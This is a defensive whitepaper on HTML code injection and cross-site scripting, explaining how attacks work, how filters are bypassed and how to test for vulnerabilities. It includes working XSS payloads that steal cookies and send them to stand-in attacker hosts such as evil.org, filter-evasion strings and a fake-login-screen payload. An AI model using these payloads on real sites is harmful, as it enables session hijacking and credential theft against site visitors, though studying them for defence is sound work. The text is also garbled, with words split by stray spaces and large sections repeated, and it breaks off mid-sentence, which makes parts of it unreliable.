This document discusses HTML code injection and cross-site scripting (XSS) vulnerabilities. It explains that many websites are vulnerable to XSS attacks because they do not properly sanitize user input that gets embedded in dynamically-generated web pages. Attackers can exploit these vulnerabilities to inject malicious scripts that get executed by visitors' browsers. The document provides details on common HTML tags used in these attacks like <SCRIPT> and <EMBED> and advises on securing websites against code injection attacks.
This document discusses HTML code injection and cross-site scripting (XSS) vulnerabilities. It explains that many websites are vulnerable to XSS attacks because they do not properly sanitize user input that gets embedded in dynamically-generated web pages. Attackers can exploit these vulnerabilities to inject malicious scripts that get executed by visitors' browsers. The document provides details on common HTML tags used in these attacks like <SCRIPT> and <EMBED> and advises on securing websites against code injection attacks.
This document discusses HTML code injection and cross-site scripting (XSS) vulnerabilities. It explains that many websites are vulnerable to XSS attacks because they do not properly sanitize user input that gets embedded in dynamically-generated web pages. Attackers can exploit these vulnerabilities to inject malicious scripts that get executed by visitors' browsers. The document provides details on common HTML tags used in these attacks like <SCRIPT> and <EMBED> and advises on securing websites against code injection attacks.
This document discusses HTML code injection and cross-site scripting (XSS) vulnerabilities. It explains that many websites are vulnerable to XSS attacks because they do not properly sanitize user input that gets embedded in dynamically-generated web pages. Attackers can exploit these vulnerabilities to inject malicious scripts that get executed by visitors' browsers. The document provides details on common HTML tags used in these attacks like <SCRIPT> and <EMBED> and advises on securing websites against code injection attacks.
Understanding the cause and effect of CSS (XSS) Vulnerabilities
As web-based applications have become more sophisticated, the types of vulnerabi lities are capable of exploiting has rapidly increased. A particular class of at tacks commonly referred to as code insertion and often Cross-Site Scripting has beco me increasingly popular. Unfortunately, the number of applications vulnerable to these attacks is staggering, and the varieties of ways attackers are finding to successfully exploit them is on the increase. Analysis of many sites has indica ted that not only are the majority of sites vulnerable, but they are vulnerable to many different methods and much of their content is affected. Introduction Web servers delivering dynamic content to Internet clients constitute an integra l component of most organisations online service offerings. The ability to tune content and respond to an individual client request represents standard function ality for any successful site. Unfortunately, due to poorly developed applicatio n code and data processing systems, the majority of these successful sites are v ulnerable to attacks that focus upon the way HTML content is generated and inter preted by client browsers. Attackers are often able to embed malicious HTML-base d content within client web requests. With sufficient forethought and analysis, attackers can exploit these flaws by embedding scripting elements within the ret urned content without the knowledge of the sites visitor. Although the potential dangers have been known for several years now, the recent successes and improved understanding of cross-site scripting attacks has increa sed the importance of correctly handing user input within dynamically generated web content. High profile sites have already been shown to be susceptible to cro ss-site scripting attack. Future attacks are likely to become more sophisticated and, through automation and exploitation of client browser vulnerabilities, man y times more devastating. This document aims to educate those responsible for the management and developme nt of commercial online services by providing the information necessary to under stand the significance of the threat, and provide advice on securing application s against this type of attack. Code Insertion The success of this type of attack hinges upon the functionality of the client b rowser. In HTML, to distinguish displayable text from the interpreted markup lan guage, some characters are treated specially. One of the most common special cha racters used to define elements within the markup language is the < character, and is typically used to indicate the beginning of an HTML tag. These tags can eith er affect the formatting of the page or induce a program that the client browser executes (e.g. the <SCRIPT> tag introduces a JavaScript program). As most web browsers have the ability to interpret scripts embedded within HTML content enabled by default, should an attacker successfully inject script conten t, it will likely be executed within context of the delivery (e.g. website, HTML help, etc.) by the end user. Such scripts may be written in any number of scrip ting languages, provided that the client host can interpret the code. Scripting tags that are most often used to embed malicious content include <SCRIPT>, <OBJE CT>, <APPLET> and <EMBED>. While this document largely focuses upon the threat presented through the inject ion of malicious scripting code, other tags may be inserted and abused by an att acker. Consider the <FORM> tag by inserting the appropriate HTML tag information , an attacker could trick visitors to the site into revealing sensitive informat ion by modifying the behaviour of the existing form for instance. Other HTML tag s may be inserted to alter the appearance and behaviour of a page (e.g. alterati on of an organisations online annual accounts or presidents statement?). It is important to understand the HTML tags that are most commonly used to carry out code insertion tags. The following table details the most important attribu tes of these tags. However, it is important to note that alternative in-line scrip ting elements may be used and interpreted by the current generation of web brows ers, such as javascript:alert('executing script'). HTML Tag Description <SCRIPT> Adds a script that is to be used in the document. Attributes: * type = Specifies the language of the script. Its value must be a media typ e (e.g. text/javascript). This attribute is required by the HTML 4.0 specificati on and is a recommended replacement for the language attribute. * language = Identifies the language of the script, such as JavaScript or VB Script. * src = Specifies the URL of an outside file containing the script to be loa ded and run with the document. (Netscape only) Supported by: Netscape, IE 3+, HTML 4, Opera 3+ <OBJECT> Places an object (such as an applet, media file, etc.) on a docu ment. The tag often contains information for retrieving ActiveX controls that IE uses to display the object. Attributes: * classid = Identifies the class identifier of the object. * codebase = Identifies the URL of the objects codebase. * codetype = Specifies the media type of the code. Examples of code types in clude audio/basic, text/html, and image/gif. (IE and HTML 4.0 only) * data = Specifies the URL of the data used for the object. * name = Specifies the name of the object to be referenced by scripts on the page. * standby = Specifies the message to display while the object loads. * type = Specifies the media type for the data. * usemap = Specifies the imagemap URL to use with the object. Supported by: Netscape, IE, HTML 4 <APPLET> Used to place a Java applet on a document. It is depreciated in the HTML 4.0 specification in favour of <object> tag. Attributes: * code = Specifies the class name of the code to be executed (required). * codebase = The URL from which the code is retrieved. * name = Names the applet for reference elsewhere on the page. Supported by: Netscape, IE 3+, HTML 4 <EMBED> Embeds an object into the document. Embedded objects are most often mult imedia files that require special plug-ins to display. Specific media types and their respective plug-ins may have additional proprietary attributes for control ling the playback of the file. The closing tag is not always required, but is re commended. The tag was dropped by the HTML 4.0 specification in favour of the <o bject> tag. Attributes: * hidden = Hides the media file or player from view when set to yes. * name = Specifies the name for the embedded object for later reference with in a script. * pluginspage = Specifies the URL for information on installing the appropri ate plug-in. * src = Provides the URL to the file or object to be placed on the document. (Netscape 4+ and IE 4+ only) * code = Specifies the class name of the Java code to be executed. (IE only) * codebase = Specifies the base URL for the application. (IE only) * pluginurl = Specifies a source for installing the appropriate plug-in for the media file. (Netscape only) * type = Specifies the MIME type of the plug-in needed to run the file. (Net scape only) Supported by: Netscape, IE 3+, Opera 3+ <FORM> Indicates the beginning and end of a form. Attributes: * action = Specifies the URL of the application that will process the form. * enctype = Specifies how the values for the form controls are encoded when they are submitted to the server. * method = Specifies which HTTP method will be used to submit the form data. * target = Specifies a target window for the results of the form submission to be loaded ( _blank, _top, _parent, and _self). Supported by: All Malicious Code An embedded code attack is heavily dependant upon the delivery mechanism. Thus t he delivery method often dictates the audience the script will potentially affec t. It is interesting to note that such attacks have been around since before the In ternet and HTML. Back in the days of dial-up Bulletin Boards Systems (BBS), the problem was site visitors encoding their messages in coloured ASCII and later, t he use of vector drawing languages permitted users to redesign pages themselves. Thus many sites hosting discussion groups with user interfaces learnt along tim e ago to rigorously control the content that be could submitted. An early problem for web-based discussion groups was the over-use and unintended misuse of standard HTML tags. For instance, early message boards merely took th e user submitted text from a standard POST form. This data was then added to the discussion page, without any further processing. Users often included text form atting tags to bold, italicise or colour their text making a greater visual impa ct to their message. Unfortunately, it was not uncommon for someone to forget to provide a closing format tag, resulting in the unintentional effect of altering every following message on the page. Now consider the implications of a user em bedding the following two code snippets in their posting and what the implicatio ns would be to everyone viewing the message. Hello World! <SCRIPT>malicious code</SCRIPT> Hello World! <EMBED SRC="http://www.paedophile.com/movies/rape.mov"> Unfortunately, attackers are finding ever more ingenious methods of encoding the ir embedded attacks, and consequently many more sites are vulnerable. Of particular importance is the abuse of trust. Consider a trusted site with a p oorly coded search engine. An attacker may be able to embed their malicious code within a hyperlink to the site. When the client web browser follows the link, t he URL sent to trusted.org includes malicious code. The site sends a page back t o the browser including the value of criteria, which consequently forces the exe cution of code from the evil attackers server. For example; <A HREF="http://trusted.org/search.cgi?criteria=<SCRIPT SRC='http://evil.org/bad kama.js'></SCRIPT>"> Go to trusted.org</A> In the attack above, one source is inserting code into pages sent by another sou rce. It should be noted that this attack: disguises the link as a link to http://trusted.org, can be easily included in an HTML email message, does not supply the malicious code inline, but is downloaded from http://evil.or g. Thus the attacker retains control of the script and can update or remove the exploit code at anytime. This class of vulnerability is popularly referred to as cross-site scripting (CS S or sometimes XSS). Cross Site Scripting A cross-site scripting vulnerability is caused by the failure of an web based ap plication to validate user supplied input before returning it to the client syst em. Cross-Site refers to the security restrictions that the client browser usually places on data (i.e. cookies, dynamic content attributes, etc.) associated with a web site. By causing the victims browser to execute injected code under the sa me permissions as the web application domain, an attacker can bypass the traditi onal Document Object Model (DOM) security restrictions which can result not only in cookie theft but account hijacking, changing of web application account sett ings, spreading of a webmail worm, etc. Note that the access that an intruder has to the Document Object Model (DOM) is dependent on the security architecture of the language chosen by the attacker. S pecifically, Java applets do not provide the attacker with any access beyond the DOM and are restricted to what is commonly referred to as a sandbox. The most common web components that fall victim to CSS/XSS vulnerabilities inclu de CGI scripts, search engines, interactive bulletin boards, and custom error pa ges with poorly written input validation routines. Additionally, a victim doesnt necessarily have to click on a link; CSS code can also be made to load automatic ally in an HTML e-mail with certain manipulations of the IMG or IFRAME HTML tags . The most popular CSS/XSS attack (and devastating) is the harvesting of authentic ation cookies and session management tokens. With this information, it is often a trivial exercise for an attacker to hijack the victims active session, complet ely bypassing the authentication process. Unfortunately, the mechanism of the at tack is very simple and can be easily automated. A detailed paper by iDefence go es into great detail explaining the process, but can be quickly summarised as fo llows: 1. The attacker investigates an interesting site that normal users must authe nticate to gain access to, and that tracks the authenticated user through the us e of cookies or session IDs 2. The attacker finds a CSS vulnerable page on the site, for instance http:// trusted.org/ account.asp. 3. Using a little social engineering, the attacker creates a special link to the site and embeds it in an HTML email that he sends to a long list of potentia l victims. 4. Embedded within the special link are some coding elements specially design ed to transmit a copy of the victims cookie back to the attacker. For instance: <img src="http://trusted.org/account.asp?ak=<script>document.location .replace(' http://evil.org/steal.cgi?'+document.cookie);</script>"> 5. Unknown to the victim, the attacker has now received a copy of their cooki e information. The attacker now visits the web site and, by substituting his cookie information with that of the victims, is now perceived to be the victim by the server appli cation. Note that Cross-site scripting is commonly referred to as CSS and/or XSS. Understanding Code Insertion To date, security professions have discovered an ever increasing number of metho ds for potentially embedding code within poorly configured web applications. The following are some of the more common methods for doing so. Inline Scripting http://trusted.org/search.cgi?criteria=<script>code</script> http://trusted.org/search.cgi?val=<SCRIPT SRC='http://evil.org/badkama.js'> </SC RIPT> http://trusted.org/COM2.IMG%20src= "Javascript:alert(document.domain)" Forced Error Responses http://trusted.org/<script>code</script> This insertion facet usually occurs due to poor error handling by the web server or application component. The application fails to find the requested page and reports an error which unfortunately includes the unprocessed script data. http://trusted.org/search.cgi?blahblahblahblahblah<script>code</script> If a Java application such as a servlet fails to handle an error gracefully, and allows stack traces to be sent to the users browser, an attacker can construct a URL that will throw an exception and add his malicious script to the end of th e request. http://trusted.og/servlet/ org.apache.catalina.servlets.WebdavStatus/<script>cod e</script> In the example above, when the Tomcat servlet is called with the training illegi timate request, an error page is served containing the offending text verbatim. Non <SCRIPT> Events " [event]='code' In many cases it may be possible for an attacker to insert an exploit string, wi th the above syntax, into a HTML tag that should have been like: <A HREF="exploit string">Go</A> resulting in: <A HREF="" [event]='code'">Go</A> <b onMouseOver="self.location.href='http://evil.org/'">bolded text</b> As the client cursor moves over the bolded text, an intrinsic event occurs and t he JavaScript code is executed. JavaScript Entities <img src="&{alert('CSS Vulnerable')};"> The special character & is sometimes interpreted as a new JavaScript code segment (entity). Typical Payloads Formatting <img src = "malicious.js"> <script>alert('hacked')</script> <iframe = "malicious.js"> <script>document.write('<img src="http://evil.org/'+document.cookie+'") </script > <a href="javascript:">click-me</a> Insertion Example Dynamic URL Generation Consider an application built for running on Microsofts Internet Information Serv er (IIS) web server platform. Dynamic content is delivered through IISs Active Se rver Pages (ASP). Within the sample page, a dynamically built HTML tag for refining search paramet ers is constructed as follows: <A HREF="http://trusted.org/search_main.asp? searchstring=SomeString">click-me</ A> and the ASP code required to generate a further query based upon this submitted information is: <% var BaserUrl = "http://trusted.org/search2.asp? searchagain=";Response.Write("<a href=\"" + BaseUrl + Request.QueryString("SearchString") + "\">click-me</a>" ) %> If the attacker was to replace the SomeString with their own code, as indicated ne xt: <a href="http://trusted.org/search_main.asp? SearchString=%22+onmouoseover%3D%27ClientForm% 2Eaction%3D%22evil%2Eorg%2Fget%2Easp%3FData% 3D%22+%2B+ClientForm%2EPersonalData%3BClientForm% 2Esubmit%3B%27">FooBar</a> The likely result found in the dynamically generated ASP page will be: <A HREF="http://trusted.org/search2.asp? searchagain="" onmouoseover='ClientForm. action="evil.org/get.asp?Data=" + ClientForm.PersonalData;ClientForm. submit;'">click-me</A> In this case, the attacker has added to the HTML page code, and used the DOM of the HTML page to redirect data in some form to the attackers web site. Bypassing Anti-CSS Filters A key function of any application filtering process will be the removal of possi ble dangerous special characters. However, in many circumstances it may be diffi cult to filter a large range of these characters due to the applications unique requirements. Corporate application developers must carefully evaluate how their code will per form with a variety of attack strings. In addition, they should fully understand the different methods that special characters can be encoded. One of the most popular alternative character representations is HTML escaped en coding, sometimes mistakenly referred to as Unicode encoding. In this system, th e HEX value of the ASCII character is prefixed with the % character. Char ; / ? : @ = & < > # Code %3b %2f %3f %3a %40 %3d %26 %3c %3e %22 %23
Char { } | \ ^ ~ [ ] ` % Code %7b %7d %7c %5c %5e %7e %5b %5d %60 %25 %27 To better understand the processes behind bypassing Anti-CSS filtering mechanism s, a series of detailed examples are provided below. Inserting Malicious Code Simple Filtering of < and > Many applications that implement some kind of content filtering will typically f ilter out the < and > characters at the client-side. At first glance, this looks lik e an effective way of ensuring <script> type HTML tags are not possible. Unfortu nately, not only client-side code easy to bypass, in many circumstances it can b e bypassed using a mix of alternative character representations and other specia l characters. Consider a routine that removes the < and > special characters: document.write(cleanSearchString('<>')); The attacker now uses an alternative coding for the filtered characters, \x3c and \ x3e respectively, and initialises their code with ) + to escape out of the routine. ') + '\x3cscript src=http://evil.org/malicious.js\x3e\x3c/script\x3e' Commenting out malicious code Consider an application that filters content on behalf of it clients by causing any scripting content to be safely commented out. For instance, <script>code</scri pt> is filtered by the application to become: <COMMENT> <!-- code (NOT PARSED BY FILTER) //--> </COMMENT> Unfortunately, it is a simple task to bypass the filter. This is accomplished by including script code that will close the <comment> filter process. For example , the attacker can send the following code: <script> - --> </COMMENT> <img src="http://none" onerror="alert(document.cookie);window.open( http://evil. org/fakeloginscreen.jsp); "> </script> After processing by the filter, the following code is embedded in the returned d ocument: <COMMENT> <!-- - --> </COMMENT> <img src="http://none" onerror="alert(document.cookie);window.open(http://evil.o rg/ fakeloginscreen.jsp);"> </COMMENT> This particular attack was originally designed to bypass the security filtering processes of a large web-mail provider, and would have been embedded in HTML ema il content. Users viewing the email would automatically be prompted with a fake login screen, making for an easy method of harvesting user names and passwords. Separate Window Handling A popular method of handling potentially dangerous URL information is to force t he URL to be opened in a new browser window. This then causes and malicious code to be executed in the context of a different DOM, using the target=_blank addition to the HTML <HREF> tag. Unfortunately, in many online email applications it is possible to bypass after analysing the harmless link supplied by the site. Consider a site that parses the content, <a href="javascript:">click-me</a> and, after processing, becomes: <a href="javascript:" target="_blank">click-me</a> Causing the URL to be opened in a new window. However, if the attacker constructs his HREF as follows, <a href="javascript:..." foo="bar>click-me</a> it will be interpreted as: <a href="javascript:..." foo="bar target="_blank">click-me</a> causing the code to be executed in the same page, under the same DOM. Escaped JavaScript Entities In cases where almost all special characters have are filtered from user supplie d strings, attackers must encode the entire attack string. Consider the following URL: http://trusted.org/search.cgi?query=%26%7balert%28%27EVIL %27%29%7d%3b&apropos=p os2 The %26%7balert%28%27EVIL%27%29%7d%3b resolves to &{alert('EVIL')}; causing in thi s instance an unexpected JavaScript alert window to popup, with the text EVIL. Web Integration As client web browsers have evolved, they have incorporated an increasingly dive rse range of functions. At the same time, many common desktop applications have extended their functionality to replicate or incorporate the functionality of th ese same browsers. While the security flaw may be HTML injection, and more speci fically CSS, the avenues available for a malicious user or attacker to initiate the attack are becoming ever broader. As is already evident, a popular personalis ed delivery mechanism has now become HTML email. Unfortunately, the delivery meth ods are becoming so diverse that no single security solution is available to preve nt the attack. Consider the significance of the following delivery mechanisms. The Flash! Attack Flash! is a popular application for displaying animated visual information. Is h as its own development language (ActiveScript) for creating sophisticated interac tive menus, animated movies and games. The most popular web browsers often insta ll the interpreter for these files by default and, due to the large number of si tes that use the technology; many people will install the interpreter even if it wasnt originally available with their web browser. ActiveScript has an internal function called getURL(). This function is used for redirecting the client browser to another page. Normally the parameter supplied to the function would be a URL. However, due to integration features between th e Flash! interpreter and the web browser, it is possible to insert scripting cod e that would be successfully interpreted by the client web browser. For instance, instead of: getURL("http://www.technicalinfo.net") It is possible to specify scripting code: getURL("javascript:alert(document.cookie)") Thus, it is possible to embed potentially dangerous scripting elements within a common file format. The real significance of this threat is that it potentially bypasses many corporate content inspection systems (particularly those that filt er out HTML <script> type tags) and local security web browser settings. For an attack to be successful, the dangerous Flash! file (typically terminating in a .swf extension) must be embedded within HTML data for viewing by remote clie nts. Normally this occurs with the use of the <EMBED> or <OBJECT> tags, for inst ance: <EMBED src="http://evil.org/badflash.swf" pluginspage="http://www.macromedia.com/shockw ave/download/index.cgi? P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="100" height="100"> </EMBED> The Impact The impact of malicious code insertion is often difficult to quantify and will c hange as new functionality or interactions are incorporated into both web server s and client browsers. Already, users may unintentionally execute scripts writte n by an attacker when they follow untrusted links in web pages, mail or instant messages, or any other application capable of displaying HTML content (e.g. Micr osoft Help). For this reason, a series of examples best illustrate the diversity and impact of potential threats. Consider the following examples: * An attacker often has access to the document retrieved since the malicious scripts are executed in a context that appears to have originated from the trus ted site. With the appropriate insertions, a script could be used to read fields in a form provided by the trusted server and send this data back to the attacke r. * An attacker may be able to embed script code that has additional interacti ons with the legitimate web server without alerting the victim. For example, the attacker could develop an exploit that posted data to a different page on the l egitimate web server. * An attacker may be able to poison the sites persistent cookies, thus modif ying the cookie content and causing malicious code to be executed each time the user visits the trusted site. The malicious code is stored as a field variable w ithin the cookie, and executed each time the site dynamically generates page con tent without the correct processing. * An attacker may be able to cause a hidden window to start on the client mach ine and us this to key-log all browser interaction of the victim. Should the vic tim later visit sites requiring authentication, the attacker could harvest this information. * CSS type attacks can occur over SSL-encrypted connections. The victim, acc essing a trusted host over HTTPS, may still execute an attackers code unintentio nally. If the attacker references document components on a remote host, the vict ims client browser may generate a warning message about the insecure connection. However, the attacker can circumvent this warning by simply referencing content on a SSL-capable web server. * An attacker may construct the malicious code to reference internal resourc es. Thus, an attacker may gain unauthorised access to an Intranet web server. On ly one page on one web server in a domain is required to compromise the entire d omain. * An attacker may be able to bypass policies that prevent the victim browser from executing scripts. For example, Internet Explorer security zones may prevent the execution of scripts from untrusted Internet hosts. An attacker may embed t heir code within the content of a trusted internal host. * An attacker may use a social engineering aspect to the attack. Consider an application that requires clients to complete a form to set up their account. A n attacker may be able to insert malicious code into their application data. A q uick phone call to the corporate help-desk asking for advice on their account ma y cause the execution of the malicious code on the help-desk system. * Even if the victims web browser does not support scripting, an attacker may still be able to alter the content of the page affecting its appearance, behavi our or normal operation. To date the most popular application content to be targeted by attackers has bee n web pages that: * Return results based upon user input to search engines, * Process credit card information, * Store and user supplied content in databases and cookies for later retriev al. Vulnerability Checking Finding out if your application is vulnerable to a code insertion attack is ofte n very simple. The key lies in the analysis of the dynamically generated client- side HTML content. The following process has been frequently used in the past. 1. For each visible input field (these may be located in an HTML form, or rep resented in the URL as variable=), try the most obvious scripting formats: <script>alert('CSS Vulnerable')</script> <img csstest=javascript:alert('CSS Vulnerable')> &{alert('CSS Vulnerable')}; In any case, should an alert message popup with the text CSS Vulnerable, the application component is vulnerable - specifically the input field just checked . 2. If, either of the above scripting checks cause the HTML page to display in correctly, the application component may still be vulnerable. 3. For each visible variable, submit/substitute the following string: '';!--"<CSS_Check>=&{()} (Note that the string begins with two single-quot es) On the resultant page, search for the string <CSS_Check>. If you discover <CS _Check>, it is quite probable that the application component is vulnerable. Howev er, if the word CSS_Check is no longer enclosed in something similar to %ltCSS_C heck%gt, then it may not be vulnerable. If input is displayed literally at ANY p oint in the document, it can be used to divert the flow of execution to an attac ker-supplied payload. 4. Having located the word CSS_Check, verify what (if any) other characters h ave be altered or filtered from the original string '';!--"<CSS_Check>= &{()}. Dep ending upon the filtered characters, the application component may still be vuln erable. 5. Looking closely at the returned HTML code, identify the specific string an attacker would need to break out of the current HTML tag or code sequence. If t hese characters exist, unfiltered, in responses to the test string of part 3 (ab ove) then there is a high probability that the application component is vulnerab le. 6. Moving on from the obvious fields, repeat the process for all the hidden f ields not normally editable at the client end. The best method of doing this is through the use of a free local host proxy server such as Achilles by DigiZen Se curity group and WebProxy by @stake. The proxy servers allow the editing of HTTP requests as they leave the client application, before being finally sent to the server application. 7. In many cases, data will be submitted via the HTTP GET request. Throughout the investigation, take note of potentially vulnerable application components t hat require the HTTP POST command to submit data. It is a simple process of turning a POST into a GET submission. If the applicati on component fails to respond to the GET the same way as it did for the POST sub mission, it is probably not vulnerable to a URL based inline scripting attack. Putting It All Together To bring together many of the ideas and processes discussed earlier in this docu ment, an example can be used to bring it all together. In this example, the anon ymous site has a search engine that responds to client data submissions. Normall y the site would look like this: Taking a closer look at the content source, we notice that our sample code appea rs 21 times in the document, in various formats. It appears 10 times in a format similar to: <SCRIPT language="JavaScript1.1" SRC="http://ad.uk.doubleclick.net/adj/ anonymous.com/search;cat=search;sec=search;kw=<script>alert('css_vulnerable') </script>;pos=top;sz=468x60;tile=1;ptile=1;ord=-308506361?"></SCRIPT> 9 times in a format similar to: <a href="Search?q=%3Cscript%3Ealert%28%27CSS+Vulnerable%27%29%3C%2Fscript %3E&pager.offset=10">2</a> And twice in the format similar to: document.writeln('<INPUT TYPE=\"TEXT\" NAME=\"q\" SIZE=\"16\" MAXLENGTH=\ "70\" VALUE=\'<script>alert('CSS Vulnerable')</script>\'>'); Obviously there are three different server-side processing routines for processi ng client search data. 1. In the first type (ad.uk.doubleclick.net format), it appears that the proc essing routine changes the case of characters and changes white space to the und erscore (_). 2. The second type (href=) converts special characters into their escape-enco ded formats, and white space into the + character. 3. The third type (document.writeln) places the complete string within a docu ment.writeln JavaScript routine. Several opportunities present themselves here. To make the site execute the Java Script alert box for each type, we need to force the <script> tags outside of an y other HTML tags. Thus, for each type, the following methods will work: 1. ><script>alert('CSS Vulnerable')</script><b a=a 2. a></a><script>alert('CSS Vulnerable')</script> 3. \'><script>alert%28\'CSS Vulnerable\'%29</script>< The result is the following alert box (multiple times): HTML Code Injection and Cross-site scripting Understanding the cause and effect of CSS (XSS) Vulnerabilities
As web-based applications have become more sophisticated, the types of vulnerabi lities are capable of exploiting has rapidly increased. A particular class of at tacks commonly referred to as code insertion and often Cross-Site Scripting has beco me increasingly popular. Unfortunately, the number of applications vulnerable to these attacks is staggering, and the varieties of ways attackers are finding to successfully exploit them is on the increase. Analysis of many sites has indica ted that not only are the majority of sites vulnerable, but they are vulnerable to many different methods and much of their content is affected. Introduction Web servers delivering dynamic content to Internet clients constitute an integra l component of most organisations online service offerings. The ability to tune content and respond to an individual client request represents standard function ality for any successful site. Unfortunately, due to poorly developed applicatio n code and data processing systems, the majority of these successful sites are v ulnerable to attacks that focus upon the way HTML content is generated and inter preted by client browsers. Attackers are often able to embed malicious HTML-base d content within client web requests. With sufficient forethought and analysis, attackers can exploit these flaws by embedding scripting elements within the ret urned content without the knowledge of the sites visitor. Although the potential dangers have been known for several years now, the recent successes and improved understanding of cross-site scripting attacks has increa sed the importance of correctly handing user input within dynamically generated web content. High profile sites have already been shown to be susceptible to cro ss-site scripting attack. Future attacks are likely to become more sophisticated and, through automation and exploitation of client browser vulnerabilities, man y times more devastating. This document aims to educate those responsible for the management and developme nt of commercial online services by providing the information necessary to under stand the significance of the threat, and provide advice on securing application s against this type of attack. Code Insertion The success of this type of attack hinges upon the functionality of the client b rowser. In HTML, to distinguish displayable text from the interpreted markup lan guage, some characters are treated specially. One of the most common special cha racters used to define elements within the markup language is the < character, and is typically used to indicate the beginning of an HTML tag. These tags can eith er affect the formatting of the page or induce a program that the client browser executes (e.g. the <SCRIPT> tag introduces a JavaScript program). As most web browsers have the ability to interpret scripts embedded within HTML content enabled by default, should an attacker successfully inject script conten t, it will likely be executed within context of the delivery (e.g. website, HTML help, etc.) by the end user. Such scripts may be written in any number of scrip ting languages, provided that the client host can interpret the code. Scripting tags that are most often used to embed malicious content include <SCRIPT>, <OBJE CT>, <APPLET> and <EMBED>. While this document largely focuses upon the threat presented through the inject ion of malicious scripting code, other tags may be inserted and abused by an att acker. Consider the <FORM> tag by inserting the appropriate HTML tag information , an attacker could trick visitors to the site into revealing sensitive informat ion by modifying the behaviour of the existing form for instance. Other HTML tag s may be inserted to alter the appearance and behaviour of a page (e.g. alterati on of an organisations online annual accounts or presidents statement?). It is important to understand the HTML tags that are most commonly used to carry out code insertion tags. The following table details the most important attribu tes of these tags. However, it is important to note that alternative in-line scrip ting elements may be used and interpreted by the current generation of web brows ers, such as javascript:alert('executing script'). HTML Tag Description <SCRIPT> Adds a script that is to be used in the document. Attributes: * type = Specifies the language of the script. Its value must be a media typ e (e.g. text/javascript). This attribute is required by the HTML 4.0 specificati on and is a recommended replacement for the language attribute. * language = Identifies the language of the script, such as JavaScript or VB Script. * src = Specifies the URL of an outside file containing the script to be loa ded and run with the document. (Netscape only) Supported by: Netscape, IE 3+, HTML 4, Opera 3+ <OBJECT> Places an object (such as an applet, media file, etc.) on a docu ment. The tag often contains information for retrieving ActiveX controls that IE uses to display the object. Attributes: * classid = Identifies the class identifier of the object. * codebase = Identifies the URL of the objects codebase. * codetype = Specifies the media type of the code. Examples of code types in clude audio/basic, text/html, and image/gif. (IE and HTML 4.0 only) * data = Specifies the URL of the data used for the object. * name = Specifies the name of the object to be referenced by scripts on the page. * standby = Specifies the message to display while the object loads. * type = Specifies the media type for the data. * usemap = Specifies the imagemap URL to use with the object. Supported by: Netscape, IE, HTML 4 <APPLET> Used to place a Java applet on a document. It is depreciated in the HTML 4.0 specification in favour of <object> tag. Attributes: * code = Specifies the class name of the code to be executed (required). * codebase = The URL from which the code is retrieved. * name = Names the applet for reference elsewhere on the page. Supported by: Netscape, IE 3+, HTML 4 <EMBED> Embeds an object into the document. Embedded objects are most often mult imedia files that require special plug-ins to display. Specific media types and their respective plug-ins may have additional proprietary attributes for control ling the playback of the file. The closing tag is not always required, but is re commended. The tag was dropped by the HTML 4.0 specification in favour of the <o bject> tag. Attributes: * hidden = Hides the media file or player from view when set to yes. * name = Specifies the name for the embedded object for later reference with in a script. * pluginspage = Specifies the URL for information on installing the appropri ate plug-in. * src = Provides the URL to the file or object to be placed on the document. (Netscape 4+ and IE 4+ only) * code = Specifies the class name of the Java code to be executed. (IE only) * codebase = Specifies the base URL for the application. (IE only) * pluginurl = Specifies a source for installing the appropriate plug-in for the media file. (Netscape only) * type = Specifies the MIME type of the plug-in needed to run the file. (Net scape only) Supported by: Netscape, IE 3+, Opera 3+ <FORM> Indicates the beginning and end of a form. Attributes: * action = Specifies the URL of the application that will process the form. * enctype = Specifies how the values for the form controls are encoded when they are submitted to the server. * method = Specifies which HTTP method will be used to submit the form data. * target = Specifies a target window for the results of the form submission to be loaded ( _blank, _top, _parent, and _self). Supported by: All Malicious Code An embedded code attack is heavily dependant upon the delivery mechanism. Thus t he delivery method often dictates the audience the script will potentially affec t. It is interesting to note that such attacks have been around since before the In ternet and HTML. Back in the days of dial-up Bulletin Boards Systems (BBS), the problem was site visitors encoding their messages in coloured ASCII and later, t he use of vector drawing languages permitted users to redesign pages themselves. Thus many sites hosting discussion groups with user interfaces learnt along tim e ago to rigorously control the content that be could submitted. An early problem for web-based discussion groups was the over-use and unintended misuse of standard HTML tags. For instance, early message boards merely took th e user submitted text from a standard POST form. This data was then added to the discussion page, without any further processing. Users often included text form atting tags to bold, italicise or colour their text making a greater visual impa ct to their message. Unfortunately, it was not uncommon for someone to forget to provide a closing format tag, resulting in the unintentional effect of altering every following message on the page. Now consider the implications of a user em bedding the following two code snippets in their posting and what the implicatio ns would be to everyone viewing the message. Hello World! <SCRIPT>malicious code</SCRIPT> Hello World! <EMBED SRC="http://www.paedophile.com/movies/rape.mov"> Unfortunately, attackers are finding ever more ingenious methods of encoding the ir embedded attacks, and consequently many more sites are vulnerable. Of particular importance is the abuse of trust. Consider a trusted site with a p oorly coded search engine. An attacker may be able to embed their malicious code within a hyperlink to the site. When the client web browser follows the link, t he URL sent to trusted.org includes malicious code. The site sends a page back t o the browser including the value of criteria, which consequently forces the exe cution of code from the evil attackers server. For example; <A HREF="http://trusted.org/search.cgi?criteria=<SCRIPT SRC='http://evil.org/bad kama.js'></SCRIPT>"> Go to trusted.org</A> In the attack above, one source is inserting code into pages sent by another sou rce. It should be noted that this attack: disguises the link as a link to http://trusted.org, can be easily included in an HTML email message, does not supply the malicious code inline, but is downloaded from http://evil.or g. Thus the attacker retains control of the script and can update or remove the exploit code at anytime. This class of vulnerability is popularly referred to as cross-site scripting (CS S or sometimes XSS). Cross Site Scripting A cross-site scripting vulnerability is caused by the failure of an web based ap plication to validate user supplied input before returning it to the client syst em. Cross-Site refers to the security restrictions that the client browser usually places on data (i.e. cookies, dynamic content attributes, etc.) associated with a web site. By causing the victims browser to execute injected code under the sa me permissions as the web application domain, an attacker can bypass the traditi onal Document Object Model (DOM) security restrictions which can result not only in cookie theft but account hijacking, changing of web application account sett ings, spreading of a webmail worm, etc. Note that the access that an intruder has to the Document Object Model (DOM) is dependent on the security architecture of the language chosen by the attacker. S pecifically, Java applets do not provide the attacker with any access beyond the DOM and are restricted to what is commonly referred to as a sandbox. The most common web components that fall victim to CSS/XSS vulnerabilities inclu de CGI scripts, search engines, interactive bulletin boards, and custom error pa ges with poorly written input validation routines. Additionally, a victim doesnt necessarily have to click on a link; CSS code can also be made to load automatic ally in an HTML e-mail with certain manipulations of the IMG or IFRAME HTML tags . The most popular CSS/XSS attack (and devastating) is the harvesting of authentic ation cookies and session management tokens. With this information, it is often a trivial 